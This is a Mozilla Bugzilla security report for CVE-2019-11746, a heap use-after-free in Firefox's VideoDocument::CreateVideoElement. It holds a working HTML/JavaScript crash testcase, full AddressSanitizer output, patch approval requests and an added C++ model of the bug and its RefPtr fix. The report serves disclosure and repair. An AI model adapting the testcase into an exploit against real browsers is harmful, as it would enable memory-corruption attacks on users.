Closed Bug 1564449 (CVE-2019-11746) Opened 6 years ago Closed 6 years ago

heap-use-after-free in mozilla::dom::VideoDocument::CreateVideoElement

Categories

(Core :: DOM: Core & HTML, defect, P1)

70 Branch
defect

Tracking


VERIFIED FIXED
mozilla70
Tracking Status
firefox-esr60 69+ verified
firefox-esr68 69+ verified
firefox68 --- wontfix
firefox69 + verified
firefox70 + verified

People

(Reporter: nils, Assigned: smaug)

Details

(Keywords: csectype-uaf, reporter-external, sec-high, Whiteboard: [adv-main69+][adv-esr68.1+][adv-esr60.9+])

Attachments

(4 files)

The following testcase crashes the latest ASAN build of Firefox 70.0a1 (BuildID=20190709034824). It requires a fuzzing build (--enable-fuzzing) and the pref user_pref("fuzzing.enabled",true). I am using a Python 2 web server (python -m SimpleHTTPServer) to host the testcase. It requires the attached webm file in the same directory. It works most reliably when loaded in many tabs at the same time.

crash.html:

<script>
var fun1_called=0,fun2_called=0;

// Synchronous XHR: spins a nested event loop from inside the listener so that
// queued work (network OnStartRequest, async cycle-collector freeing) runs
// while the video document is still being set up.
function spin() {
    var x=new XMLHttpRequest();
    x.open("POST","/post",false);
    x.send("X");
}

function start() {
    o10=new AudioContext();
    // Opening the webm directly makes the popup a synthetic VideoDocument.
    o15=window.open('test-encrypted-different-av-keys.webm','popup34'+Math.random(),'height=54,width=-5,centerscreen,outerWidth=12,status,scrollbars');
    o19=window.document;   // the opener's own document
    window.top.setTimeout(fun0, 4);
}

function fun0() {
    // Listen for mutations of the popup while its synthetic body is being built.
    o15.addEventListener('DOMSubtreeModified',fun1);
}

function fun1() {
    if(window.top.fun1_called++)return;
    spin();
    // Evaluate a javascript: URL inside the popup so fun2 receives the popup's
    // document and stores it in the opener as o98.
    o15.fun2=fun2;o15.eval("location.href='javascript:fun2(this,document,window)'");
    spin();
    // Replace the popup's <body> with a frameset created in the opener's
    // document; nothing holds the old body any more.
    o123=o19.createElement('frameset');
    try{o98.body=o123;}catch(e){}
    // The final spin lets the cycle collector free the old body (see the
    // AsyncFreeSnowWhite frames in the "freed by" stack below).
    spin();
}

function fun2(othis, doc, t, count) {
    if(window.top.fun2_called++)return;
    window.top.o98=doc;
    // FuzzingFunctions is only exposed in --enable-fuzzing builds with
    // fuzzing.enabled set; force GC and CC passes here.
    FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();
}
</script>
<body onload="start()"></body>

ASAN output:

=================================================================
==12771==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d00009e8e0 at pc 0x7f7ffe67f8e7 bp 0x7ffd585903b0 sp 0x7ffd585903a8
READ of size 8 at 0x60d00009e8e0 thread T0 (Web Content)
    #0 0x7f7ffe67f8e6 in AppendChildTo /builds/worker/workspace/build/src/dom/base/nsINode.h:769:12
    #1 0x7f7ffe67f8e6 in mozilla::dom::VideoDocument::CreateVideoElement() /builds/worker/workspace/build/src/dom/html/VideoDocument.cpp:135
    #2 0x7f7ffe67ef69 in mozilla::dom::VideoDocument::StartLayout() /builds/worker/workspace/build/src/dom/html/VideoDocument.cpp:73:17
    #3 0x7f7ffe64f46d in mozilla::dom::MediaDocumentStreamListener::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/dom/html/MediaDocument.cpp:55:14
    #4 0x7f7ff8ab986c in nsDocumentOpenInfo::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:311:34
    #5 0x7f7ff6bbf891 in mozilla::net::HttpChannelChild::DoOnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:683:20
    #6 0x7f7ff6bcc6fd in mozilla::net::HttpChannelChild::OnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:608:3
    #7 0x7f7ff6c97469 in mozilla::net::StartRequestEvent::Run() /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:427:13
    #8 0x7f7ff6a3e886 in mozilla::net::ChannelEventQueue::RunOrEnqueue(mozilla::net::ChannelEvent*, bool) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:210:10
    #9 0x7f7ff6bca7c3 in mozilla::net::HttpChannelChild::RecvOnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, short const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:489:12
    #10 0x7f7ff7904ebf in mozilla::net::PHttpChannelChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PHttpChannelChild.cpp:859:28
    #11 0x7f7ff75dac19 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:7197:32
    #12 0x7f7ff72b3236 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2158:25
    #13 0x7f7ff72ae13b in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2082:9
    #14 0x7f7ff72b06f7 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1939:3
    #15 0x7f7ff72b1487 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1970:13
    #16 0x7f7ff5e698b5 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #17 0x7f7ff5eaa7fc in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #18 0x7f7ff5eb2684 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #19 0x7f7ff72bc5f4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:110:5
    #20 0x7f7ff7193afe in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #21 0x7f7ff7193afe in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #22 0x7f7ff7193afe in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #23 0x7f80008e24a3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #24 0x7f8004f5f10e in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #25 0x7f7ff7193afe in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #26 0x7f7ff7193afe in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #27 0x7f7ff7193afe in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #28 0x7f8004f5dc51 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #29 0x55bf9ba64113 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #30 0x55bf9ba64113 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #31 0x7f801af30b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #32 0x55bf9b98564c in _start (/home/nils/browser/firefox/firefox/firefox+0x4564c)

0x60d00009e8e0 is located 0 bytes inside of 136-byte region [0x60d00009e8e0,0x60d00009e968)
freed by thread T0 (Web Content) here:
    #0 0x55bf9ba30ce2 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7f7ff5c97378 in MaybeKillObject /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2429:29
    #2 0x7f7ff5c97378 in SnowWhiteKiller::Visit(nsPurpleBuffer&, nsPurpleBufferEntry*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2459
    #3 0x7f7ff5c6afb3 in void nsPurpleBuffer::VisitEntries<SnowWhiteKiller>(SnowWhiteKiller&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:956:27
    #4 0x7f7ff5c6c6d8 in nsCycleCollector::FreeSnowWhiteWithBudget(js::SliceBudget&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2624:14
    #5 0x7f7ff83f525c in AsyncFreeSnowWhite::Run() /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:146:9
    #6 0x7f7ff5ecdf62 in IdleRunnableWrapper::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:331:22
    #7 0x7f7ff5eaa7fc in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #8 0x7f7ff5eb2684 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #9 0x7f80003af2e3 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2909:31)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:348:25
    #10 0x7f80003af2e3 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*, bool) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2909
    #11 0x7f80003acf5a in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable<mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2727:11
    #12 0x7f7ffcac17cd in mozilla::dom::XMLHttpRequest_Binding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1346:24
    #13 0x7f7ffd8fc222 in bool mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions>(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3181:13
    #14 0x7f800523e8a7 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #15 0x7f800523e8a7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
    #16 0x7f800521ee80 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
    #17 0x7f800521ee80 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3088
    #18 0x7f80052085e8 in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #19 0x7f800523f3af in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
    #20 0x7f80052415d2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
    #21 0x7f8005faa7cf in js::ForwardingProxyHandler::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:162:10
    #22 0x7f8005f66d11 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:237:19
    #23 0x7f8005f89c8d in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:504:19
    #24 0x7f800523fa75 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:514:14
    #25 0x7f80052415d2 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
    #26 0x7f8005ed3cc8 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2658:10
    #27 0x7f7ffced92fe in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:52:8
    #28 0x7f7ffe197924 in HandleEvent<mozilla::dom::EventTarget *> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:66:12
    #29 0x7f7ffe197924 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1024
    #30 0x7f7ffe199847 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1222:17
    #31 0x7f7ffe17a161 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
    #32 0x7f7ffe17a161 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #33 0x7f7ffe178875 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:587:14
    #34 0x7f7ffe17f104 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
    #35 0x7f7ffe186e4b in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp

previously allocated by thread T0 (Web Content) here:
    #0 0x55bf9ba31063 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x55bf9ba65dcd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f7ffe42be4b in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7f7ffe42be4b in NS_NewHTMLBodyElement(already_AddRefed<mozilla::dom::NodeInfo>&&, mozilla::dom::FromParser) /builds/worker/workspace/build/src/dom/html/HTMLBodyElement.cpp:24
    #4 0x7f7ffe660643 in mozilla::dom::MediaDocument::CreateSyntheticDocument() /builds/worker/workspace/build/src/dom/html/MediaDocument.cpp:235:39
    #5 0x7f7ffe67fa3a in mozilla::dom::VideoDocument::SetScriptGlobalObject(nsIScriptGlobalObject*) /builds/worker/workspace/build/src/dom/html/VideoDocument.cpp:89:30
    #6 0x7f7ffa148eac in nsGlobalWindowOuter::SetNewDocument(mozilla::dom::Document*, nsISupports*, bool) /builds/worker/workspace/build/src/dom/base/nsGlobalWindowOuter.cpp:2169:14
    #7 0x7f8001190c8a in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, bool, bool, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:967:22
    #8 0x7f800118fc0c in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:718:10
    #9 0x7f8004044f60 in nsDocShell::SetupNewViewer(nsIContentViewer*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8551:7
    #10 0x7f8004043b51 in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6387:17
    #11 0x7f8003fcb7c4 in nsDocShell::CreateContentViewer(nsTSubstring<char> const&, nsIRequest*, nsIStreamListener**) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8354:3
    #12 0x7f8003fc84aa in nsDSURIContentListener::DoContent(nsTSubstring<char> const&, bool, nsIRequest*, nsIStreamListener**, bool*) /builds/worker/workspace/build/src/docshell/base/nsDSURIContentListener.cpp:183:20
    #13 0x7f7ff8abe983 in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:748:18
    #14 0x7f7ff8abafb4 in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:420:30
    #15 0x7f7ff8ab9666 in nsDocumentOpenInfo::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:299:8
    #16 0x7f7ff6bbf891 in mozilla::net::HttpChannelChild::DoOnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:683:20
    #17 0x7f7ff6bcc6fd in mozilla::net::HttpChannelChild::OnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:608:3
    #18 0x7f7ff6c97469 in mozilla::net::StartRequestEvent::Run() /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:427:13
    #19 0x7f7ff6a3e886 in mozilla::net::ChannelEventQueue::RunOrEnqueue(mozilla::net::ChannelEvent*, bool) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:210:10
    #20 0x7f7ff6bca7c3 in mozilla::net::HttpChannelChild::RecvOnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, short const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:489:12
    #21 0x7f7ff7904ebf in mozilla::net::PHttpChannelChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PHttpChannelChild.cpp:859:28
    #22 0x7f7ff75dac19 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:7197:32
    #23 0x7f7ff72b3236 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2158:25
    #24 0x7f7ff72ae13b in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2082:9
    #25 0x7f7ff72b06f7 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1939:3
    #26 0x7f7ff72b1487 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1970:13
    #27 0x7f7ff5e698b5 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #28 0x7f7ff5eaa7fc in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #29 0x7f7ff5eb2684 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #30 0x7f7ff72bc5f4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:110:5

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/base/nsINode.h:769:12 in AppendChildTo
Shadow bytes around the buggy address:
  0x0c1a8000bcc0: fd fd fd fd fd fd fa fa fa fa fa fa fa fa 00 00
  0x0c1a8000bcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c1a8000bce0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1a8000bcf0: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa
  0x0c1a8000bd00: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c1a8000bd10: 00 00 00 fa fa fa fa fa fa fa fa fa[fd]fd fd fd
  0x0c1a8000bd20: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c1a8000bd30: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd
  0x0c1a8000bd40: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c1a8000bd50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a8000bd60: fd fd fa fa fa fa fa fa fa fa fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==12771==ABORTING
Attached file ASAN output
Group: core-security → dom-core-security

Nothing keeps body alive.

Assignee: nobody → bugs

Hard to come up with a good commit message for this :)

hmm, plugin document has the same issue, and image document

Comment on attachment 9077506 [details]
Bug 1564449, ensure the right body element is used throughout the method call, r=mccr8

Security Approval Request

  • How easily could an exploit be constructed based on the patch?: The patch does pinpoint where the issue is.
  • Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?: No
  • Which older supported branches are affected by this flaw?: all
  • If not all supported branches, which bug introduced the flaw?: None
  • Do you have backports for the affected branches?: Yes
  • If not, how different, hard to create, and risky will they be?: (The same patch seems to apply even to esr60)
  • How likely is this patch to cause regressions; how much testing does it need?: Very unlikely, just keeping an object alive a tad longer.

Beta/Release Uplift Approval Request

  • User impact if declined: security sensitive crashes
  • Is this code covered by automated tests?: No
  • Has the fix been verified in Nightly?: No
  • Needs manual test from QE?: No
  • If yes, steps to reproduce:
  • List of other uplifts needed: None
  • Risk to taking this patch: Low
  • Why is the change risky/not risky? (and alternatives if risky):
  • String changes made/needed:

ESR Uplift Approval Request

  • If this is not a sec:{high,crit} bug, please state case for ESR consideration:
  • User impact if declined:
  • Fix Landed on Version:
  • Risk to taking this patch: Low
  • Why is the change risky/not risky? (and alternatives if risky):
  • String or UUID changes made by this patch:
Attachment #9077506 - Flags: sec-approval?
Attachment #9077506 - Flags: approval-mozilla-esr68?
Attachment #9077506 - Flags: approval-mozilla-beta?
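The comments "Nothing keeps body alive" and "just keeping an object alive a tad longer", together with the commit message "ensure the right body element is used throughout the method call", describe a standard Gecko lifetime hazard: a method takes a raw pointer to a refcounted DOM node, re-enters content script (here via the DOMSubtreeModified listener and the sync XHR spinning the event loop), script drops the last strong reference, and the method then uses the stale pointer. The following is an added, self-contained C++ model of that pattern and of the RefPtr-style fix; it is not Gecko code, and Element, Document, RefPtr and RunScriptThatReplacesBody are stand-ins for the real types. Liveness is tracked by id so the demo never dereferences freed memory.

```cpp
// Added example (not Gecko code): a minimal model of the lifetime bug in this
// report and of the fix. All names are hypothetical stand-ins.
#include <cassert>
#include <cstdio>
#include <set>

// Ids of every element ever destroyed: a raw pointer whose id is in here is
// dangling. Tracked by id so the demo never touches freed memory.
static std::set<int> g_destroyed;
static int g_next_id = 0;

struct Element {
    int id;
    int refcnt = 0;
    Element* parent = nullptr;
    Element() : id(g_next_id++) {}
    ~Element() { g_destroyed.insert(id); }
    void AddRef() { ++refcnt; }
    void Release() { if (--refcnt == 0) delete this; }
    // Only the parent link matters for the demo.
    void AppendChildTo(Element* child) { child->parent = this; }
};

// Cut-down strong pointer with RefPtr-like semantics.
template <class T> class RefPtr {
    T* p = nullptr;
public:
    RefPtr() = default;
    RefPtr(T* q) : p(q) { if (p) p->AddRef(); }
    RefPtr(const RefPtr& o) : p(o.p) { if (p) p->AddRef(); }
    RefPtr& operator=(T* q) { if (q) q->AddRef(); if (p) p->Release(); p = q; return *this; }
    RefPtr& operator=(const RefPtr& o) { return *this = o.p; }
    ~RefPtr() { if (p) p->Release(); }
    T* get() const { return p; }
    T* operator->() const { return p; }
};

// The document holds the only strong reference to its body; content script
// may swap it at any time.
struct Document {
    RefPtr<Element> body;
};

// Stand-in for the re-entry point: script replaces the body, which drops the
// old body's only strong reference (in the testcase: o98.body = frameset,
// then the cycle collector frees it during the sync XHR spin).
static void RunScriptThatReplacesBody(Document& doc) {
    doc.body = new Element();
}

struct Result {
    bool used_freed_body;  // true: the method would have touched a freed node
    int body_id;
};

// BEFORE the fix: raw pointer fetched once, script runs, stale pointer used.
// This is the body->AppendChildTo read that ASan reports.
Result CreateVideoElementVulnerable(Document& doc) {
    Element* body = doc.body.get();   // raw: nothing keeps body alive
    int id = body->id;                // remembered before it can be freed
    RunScriptThatReplacesBody(doc);   // old body deleted here
    bool freed = g_destroyed.count(id) != 0;
    if (!freed) {                     // never reached in this scenario
        RefPtr<Element> video = new Element();
        body->AppendChildTo(video.get());
    }
    return {freed, id};
}

// AFTER the fix: hold a strong reference for the whole method, so the same
// body element is used throughout even if doc.body is replaced meanwhile.
Result CreateVideoElementFixed(Document& doc) {
    RefPtr<Element> body = doc.body;  // strong: survives the script call
    int id = body->id;
    RunScriptThatReplacesBody(doc);   // doc.body now points elsewhere
    bool freed = g_destroyed.count(id) != 0;  // false: our RefPtr holds it
    RefPtr<Element> video = new Element();
    body->AppendChildTo(video.get()); // safe; old body dies when we return
    return {freed, id};
}

int main() {
    Document d1; d1.body = new Element();
    Result v = CreateVideoElementVulnerable(d1);
    Document d2; d2.body = new Element();
    Result f = CreateVideoElementFixed(d2);
    std::printf("vulnerable used freed body: %d, fixed used freed body: %d\n",
                v.used_freed_body, f.used_freed_body);
    return 0;
}
```

The fixed variant is the whole of the patch's idea: the extra strong reference costs one AddRef/Release pair and makes the method immune to whatever content script does to the document during the re-entrant call.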

Because of the obviousness of the fix, I'm giving sec-approval+ but only for checkin on August 6, 2019, a bit further into the current cycle. We'll want to backport this to Beta, ESR68, and ESR60 at that time.

Attachment #9077506 - Flags: sec-approval? → sec-approval+
Priority: -- → P1

There's a r+ patch which didn't land and no activity in this bug for 2 weeks.
